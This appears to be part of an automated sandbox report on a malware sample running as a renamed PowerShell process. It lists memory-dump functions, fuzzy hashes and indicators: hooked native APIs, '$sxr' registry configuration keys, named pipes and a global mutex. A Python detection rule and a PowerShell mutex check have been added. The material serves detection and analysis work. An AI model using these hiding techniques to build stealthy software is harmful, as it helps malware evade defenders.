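    findings: list[tuple[str, str]] = []
    for r in records:
        meta = parse_sdmp_name(r.source_file)
        where = f"pid {meta['pid']} ({r.process}) base 0x{meta['base']:X}"
        if not r.based_on_pe and meta["protect"] == PAGE_EXECUTE_READWRITE:
            findings.append(("rwx_non_pe", f"{where}: RWX region not backed by a PE image"))
        native = [s for s in r.strings if NATIVE_API_RE.match(s)]
        if native and any(s.lower() == "ntdll.dll" for s in r.strings):
            findings.append(("native_api_by_name", f"{where}: {', '.join(native)} via ntdll.dll"))
        findings += [("device_path", f"{where}: references {s}") for s in r.strings if s.startswith("\\Device\\")]
    return findings
```

Run against the full function-analysis section of a report (with the page indentation stripped, as the parser does per line), the first rule isolates every dump that is executing code outside a mapped image, which for this sample is the 0x7FFD9BAB0000 and 0x7FFD9BB80000 regions in $sxr-powershell; the Instruction Fuzzy Hash values it keeps per record can then be compared across samples without re-running the sandbox.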

                                                                                                                      APIs
                                                                                                                      Strings
Memory Dump Source
• Source File: 00000015.00000002.2924790905.0000024287880000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024287880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_24287880000_$sxr-powershell.jbxd
Similarity
• API ID: _invalid_parameter_noinfo
• String ID: *?$HIJKLMNOPQRSTUVWXYZ
• API String ID: 3215553584-1407779936
Control-flow Graph (rendered graph omitted; recovered from the graph residue): basic block 242878b1650-242878b16e2 calls GetProcessHeap, several internal helper routines and RegOpenKeyExW, then runs a chain of further RegOpenKeyExW calls, each followed by a branch into a helper routine and RegCloseKey before the next open; the chain ends at block 242878b18ce-242878b18d8.
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: Heap$CloseOpen$Process$Alloc$EnumFreeInfoQueryValuelstrlen
• String ID: SOFTWARE\$sxrconfig$paths$pid$process_names$service_names$startup$tcp_local$tcp_remote$udp
• API String ID: 106492572-3028563969
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: CurrentThread$AddressHandleLibraryLoadModuleProc
• String ID: EnumServiceGroupW$EnumServicesStatusExW$NtDeviceIoControlFile$NtEnumerateKey$NtEnumerateValueKey$NtQueryDirectoryFile$NtQueryDirectoryFileEx$NtQuerySystemInformation$NtResumeThread$Sysprep_Clean_Validate_Opk$advapi32.dll$ntdll.dll$sechost.dll$spopk.dll
• API String ID: 1741086925-759476645
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: Heap$Process$Alloc$Free$EnumInfoQueryValuelstrlen
• String ID: d
• API String ID: 2005889112-2564639436
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: Process$File$CloseHandle$CreateCurrentOpenReadThreadWow64Write
• String ID: \\.\pipe\$sxrchildproc34226543a32$\\.\pipe\$sxrchildproc38764243a64
• API String ID: 2171963597-1213686612
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: Heap$Process$AllocEnumFreeInfoQueryValue
• String ID: d
• API String ID: 3743429067-2564639436
Memory Dump Source
• Source File: 00000015.00000002.2924790905.0000024287880000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024287880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_24287880000_$sxr-powershell.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: Initialize__scrt_acquire_startup_lock__scrt_dllmain_after_initialize_c__scrt_dllmain_crt_thread_attach__scrt_release_startup_lock
• String ID:
• API String ID: 190073905-0
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: Library$Load$AddressErrorFreeLastProc
• String ID: api-ms-
• API String ID: 2559590344-2084034818
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: ConsoleWrite$CloseCreateErrorFileHandleLast
• String ID: CONOUT$
• API String ID: 3230265001-3130406586
                                                                                                                      • Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
                                                                                                                      • Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmpDownload File
                                                                                                                      Joe Sandbox IDA Plugin
                                                                                                                      • Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
                                                                                                                      Similarity
                                                                                                                      • API ID: Thread$Current$Context
                                                                                                                      • String ID:
                                                                                                                      • API String ID: 1666949209-0

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID: $sxr
• API String ID: 756756679-21942930

APIs
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: FileName$CloseFindHandleModuleOpenPathProcesslstrlen
• String ID:
• API String ID: 517849248-0

APIs
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModuleTerminateThread
• String ID:
• API String ID: 449555515-0

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: CurrentImageNonwritableUnwind__except_validate_context_record
• String ID: csm$f
• API String ID: 2395640692-629598281

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: FinalHandleNamePathlstrlen
• String ID: \\?\
• API String ID: 2719912262-4282027825

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: CombinePath
• String ID: \\.\pipe\
• API String ID: 3422762182-91387939

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: AddressFreeHandleLibraryModuleProc
• String ID: CorExitProcess$mscoree.dll
• API String ID: 4061214504-1276376045

APIs
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0

APIs
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: ConsoleErrorLastMode_invalid_parameter_noinfo
• String ID:
• API String ID: 2210144848-0

APIs
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: CurrentThread
• String ID:
• API String ID: 2882836952-0

APIs
Memory Dump Source
• Source File: 00000015.00000002.2924790905.0000024287880000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024287880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_24287880000_$sxr-powershell.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0

APIs
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: _set_statfp
• String ID:
• API String ID: 1156100317-0
• Opcode ID: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction ID: c639fa3b88079f2b8429a1821158bfec4b42d62e2f4a60f41a4124fe0582ca4e
• Opcode Fuzzy Hash: 26a546e7bd77f8ca3fc0338f00591d5630f622d4a827b8b98863898f65805266
• Instruction Fuzzy Hash: E911A7A2E79E0DC1F6E81167DCDD76D30446BE5370FC44624BB66067D68B5848897330
Uniqueness
Uniqueness Score: -1.00%

APIs
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: CurrentProcessProtectVirtual$HandleModule
• String ID:
• API String ID: 1092925422-0
• Opcode ID: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
• Instruction ID: f4583b6a175e8337e864dbce55850077dfa8be934b5ac415ae73fe8ebaa8977f
• Opcode Fuzzy Hash: 95c025b2b6ac4fd8cd0aff1f1749a1d88ffa67048487cde947e6dbc57d84852c
• Instruction Fuzzy Hash: 14111926605F44D7FB648B22E94825EB7B0F785B80F844126EA8D03B94EF39C949E751
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2924790905.0000024287880000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024287880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_24287880000_$sxr-powershell.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
• API String ID: 3242871069-629598281
• Opcode ID: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
• Instruction ID: 1a8c1a66975c0376a8d0b67916ce8094e61a768ab4b40edd771f6c5e777fa4e2
• Opcode Fuzzy Hash: 2b5e796eb5467920efef0e0a99ae24113856edacf9d40b67cb560e30e154ce16
• Instruction Fuzzy Hash: 77519336721A08CAEB54DF16DC8CB1D37A5F3C4B98F918124FA1647788EB34DD89A724
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2924790905.0000024287880000.00000040.00000400.00020000.00000000.sdmp, Offset: 0000024287880000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_24287880000_$sxr-powershell.jbxd
Similarity
• API ID: CurrentImageNonwritable__except_validate_context_record
• String ID: csm$f
• API String ID: 3242871069-629598281
• Opcode ID: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
• Instruction ID: 61ae9168a048650dbea6c8268f6cc7cf5c94ca7f3ed896cae57903f33533c51e
• Opcode Fuzzy Hash: f92dbc6d1c1d953d5be36fe8438910096b534b45e3e951fcd2048bd10c89d910
• Instruction Fuzzy Hash: 5A318B32221A44DAE754DF13EC8CB1D77A5F780BC8F858114BE5647788DB38C989DB24
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
• Instruction ID: 5973971a9dbe32c64071ab0e78dd83c42a1130323f939945f63f6377bc8d51ad
• Opcode Fuzzy Hash: ca8ddeb7ac59d6e709c177a04970a920754aa102293d40bded593f37500a9fba
• Instruction Fuzzy Hash: FC71AC32200F89C2E7649A3B9D497AE7790F7C5B84FC40026FE4D47B99DE35C688A750
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: FileType
• String ID: \\.\pipe\
• API String ID: 3081899298-91387939
• Opcode ID: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
• Instruction ID: 0ac368452b6202ad694e0877350d488fb260446bb20df8a6712e35fb499e6776
• Opcode Fuzzy Hash: 7663802d97220815dd834e17801c2a4e2bb3ef89d9d316510f4c5ee1515461d8
• Instruction Fuzzy Hash: 1151C532204BC9C2E675DA2BA85C7AE7791F7CA780FD40025ED8903B99CB39C589A754
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: ErrorFileLastWrite
• String ID: U
• API String ID: 442123175-4171548499
• Opcode ID: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
• Instruction ID: 5120e88b4132f6b75c1830df960729af01e04e9ce8af581c4d474e2649275e05
• Opcode Fuzzy Hash: 33761665e30f7191252d6346bfc4364073660ee169ab4516afdd483d80f04c27
• Instruction Fuzzy Hash: 3941B232216A48D1EB609F26EC493AE77A0F3C87D4F804021EE4D87B98DB39C449DB60
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 00000242878B2A4D
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: CloseHandleMutexOpen
• String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
• API String ID: 3128266590-3670590667
• Opcode ID: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
• Instruction ID: 2454d994f2ffbbbbab1b053be6b9d75d5fd99c34b8aac145e97227e4d1861528
• Opcode Fuzzy Hash: 7f13c5918517e76ecd90b03edc6bf557ba308c82d84999e88c8a65afd720b3bc
• Instruction Fuzzy Hash: 22217F26204F48C6E770CB17AC4861EB290F7D4BA0FD55115EE8943794EF38C489E710
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
• Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw, xrefs: 00000242878B2B39
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: CloseHandleMutexOpen
• String ID: Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw
• API String ID: 3128266590-3670590667
• Opcode ID: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
• Instruction ID: b4f52836db5ece12ce3474e72006215bf1dd8b68e0b56dd6ff4e52d6796618dc
• Opcode Fuzzy Hash: 5302a5e3305b9a05be76c3053b07484aa6e553cd40859f2f5bec3a73be18632a
• Instruction Fuzzy Hash: E1214822600F48C2E7609F17AC4875EB3A4F7C8B94FC44025EE8983754EF34C88AA750
Uniqueness
Uniqueness Score: -1.00%
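The two functions above are the only ones in this dump region that combine OpenMutex/CloseHandle with a hard-coded Global\ object name, which makes that name a host-level indicator for this sample. The following PowerShell check is an added example, not part of the Joe Sandbox report or of the sample: it probes whether that named mutex is currently held on the machine without creating it. The mutex string is copied verbatim from the dump; the function name Test-MutexPresent is an assumption of this example.

```powershell
# Added example (not from the Joe Sandbox report): test whether a named mutex is
# currently held on this host. Uses Mutex.TryOpenExisting, which only opens an
# existing object and never creates one, so the probe leaves no artefact behind.
function Test-MutexPresent {
    [CmdletBinding()]
    param(
        [Parameter(Mandatory)]
        [string]$MutexName
    )
    $mutex = $null
    try {
        # Returns $true and a handle when the object exists and our token may open it.
        if ([System.Threading.Mutex]::TryOpenExisting($MutexName, [ref]$mutex)) {
            return $true
        }
        # $false here means the name is not in the object namespace at all.
        return $false
    }
    catch [System.UnauthorizedAccessException] {
        # The object exists but its DACL denies SYNCHRONIZE/MODIFY_STATE to us.
        # That is still proof of presence, so report it as a hit.
        return $true
    }
    finally {
        if ($null -ne $mutex) { $mutex.Dispose() }
    }
}

# Mutex name as recovered from memory dump 00000015.00000002.2925614777 above.
$ioc = 'Global\tmlNftmlNfSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYwSsJXkWZQZSfluqUJRhVKurdpITJfmRWiooyZfrFNaxsYw'

if (Test-MutexPresent -MutexName $ioc) {
    Write-Warning "Mutex '$ioc' is held: a process derived from this sample may be running."
} else {
    Write-Output "Mutex '$ioc' not present."
}
```

Run it in any session; because the name lives in the Global\ namespace the result does not depend on which logon session the sample was started from. A hit should be followed by locating the owning process (the report attributes this code to the renamed powershell.exe image, process 21), since the mutex check alone cannot tell a live implant from a stale handle held by a crashed one.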

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: Stringtry_get_function
• String ID: LCMapStringEx
• API String ID: 2588686239-3893581201
• Opcode ID: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
• Instruction ID: 3a23ee5cb0f6fb42c31e4c66133549b8a3fecb74301eb6ddcfb625ec7e7b532c
• Opcode Fuzzy Hash: 1fa9275d433daf0b6716fc06567d784d1258d0ff6276e676772a611a04aaaae8
• Instruction Fuzzy Hash: CE111A36608BC4C6E7A0DB16F84429EB7A4F7C9B90F944126FE8D83B19DF38C5489B50
Uniqueness
Uniqueness Score: -1.00%

APIs
Strings
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: ExceptionFileHeaderRaise
• String ID: csm
• API String ID: 2573137834-1018135373
• Opcode ID: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
• Instruction ID: c0a853a66a1f6816b8146f570d98443459de868cade9ac574d850c807f3e4b09
• Opcode Fuzzy Hash: 4e7fa5f10fb8cdd189fffd301e3fa9d361a0630010e37bb7f0a8f0acf9fdffb8
• Instruction Fuzzy Hash: F0113A32215B88C2EB608B26F88425DB7A5F7D8B94F584220EE8D07B64DF39C555DB10
Uniqueness
Uniqueness Score: -1.00%

                                                                                                                      APIs
                                                                                                                      Strings
Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: CountCriticalInitializeSectionSpintry_get_function
• String ID: InitializeCriticalSectionEx
• API String ID: 539475747-3084827643
• Opcode ID: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
• Instruction ID: 64db137c6273b1633f17dee013e8f736dcf40025c40eb91d46f100af1def2add
• Opcode Fuzzy Hash: d3308de59f6175e246a4e58d0bead6ac7e88a58d51302341d1d8d46ecdfbdf17
• Instruction Fuzzy Hash: 85F0BE25209F48E1FB859B43BC0868C7670FBC8B90FC84022BA0D03B19CE38C58DEB20
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: Valuetry_get_function
• String ID: FlsSetValue
• API String ID: 738293619-3750699315
• Opcode ID: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
• Instruction ID: 031b1a15519edeb2c29795d2a86228ad8fbea6dd58c89b0160b1ba342fee89b5
• Opcode Fuzzy Hash: c57a0a8e4a9a5bd5c5ab42880a7d7ba481cf5cc2991d860fdde5879172b30074
• Instruction Fuzzy Hash: 9FE03061205E08E2FE855B57BC0829C7221B7C8780FD84026B92D06655DE38C49DE631
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: Heap$Process$AllocFree
• String ID:
• API String ID: 756756679-0
• Opcode ID: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
• Instruction ID: 360a348532fe5a92972625e17eb10d7484a17190da89f7f21496a8893d4be203
• Opcode Fuzzy Hash: 286b6d01e01d60a9c7311f258349b816b5eba68e569a770be06b8a5557e1329f
• Instruction Fuzzy Hash: 76215622605F88C6EB518F5AE80825EF3A1FBC4B94F954015FE8D47B24EB78C4569750
Uniqueness
• Uniqueness Score: -1.00%

Memory Dump Source
• Source File: 00000015.00000002.2925614777.00000242878B0000.00000040.00001000.00020000.00000000.sdmp, Offset: 00000242878B0000, based on PE: true
• Associated: 00000015.00000002.2925614777.00000242878D5000.00000040.00001000.00020000.00000000.sdmp
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_21_2_242878b0000_$sxr-powershell.jbxd
Similarity
• API ID: Heap$AllocProcess
• String ID:
• API String ID: 1617791916-0
• Opcode ID: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
• Instruction ID: a8eb5a468c1ff8a4eae72fee16c0ea1cdc69b1dd1897ee5b43121a01d5569298
• Opcode Fuzzy Hash: d4b3fcfbe4be7c36cb8b6f9944163e5fe9bb7a40ebadcfb6d552ceb49718e017
• Instruction Fuzzy Hash: E2E03971602A08DAF7448F63D80834936E1EBC9B01F898028D90907750EF7D849AA761
Uniqueness
• Uniqueness Score: -1.00%

Execution Graph

• Execution Coverage: 68.6%
• Dynamic/Decrypted Code Coverage: 0%
• Signature Coverage: 39.3%
• Total number of Nodes: 61
• Total number of Limit Nodes: 5

Callgraph

Control-flow Graph

Memory Dump Source
• Source File: 00000016.00000002.2085757008.0000000140000000.00000040.00000001.00020000.00000000.sdmp, Offset: 0000000140000000, based on PE: true
Joe Sandbox IDA Plugin
• Snapshot File: hcaresult_22_2_140000000_dllhost.jbxd
Similarity
• API ID: Create$CloseFileFind$ChangeNotificationThreadValue$AdjustInformationLookupMappingModulePrivilegePrivilegesResourceSecuritySleepTokenViewlstrcmpi
• String ID:
• API String ID: 3489061390-0
• Opcode ID: 5edfb5cbc0324eee5daa172a89d16951d682391955e0b3df23fa179d5a448a1d
• Instruction ID: b0e1fb852f6e0543cbb1d0b345f32bc6fd7345078760f1e0bc57de08f7ced3b6
• Opcode Fuzzy Hash: 5edfb5cbc0324eee5daa172a89d16951d682391955e0b3df23fa179d5a448a1d
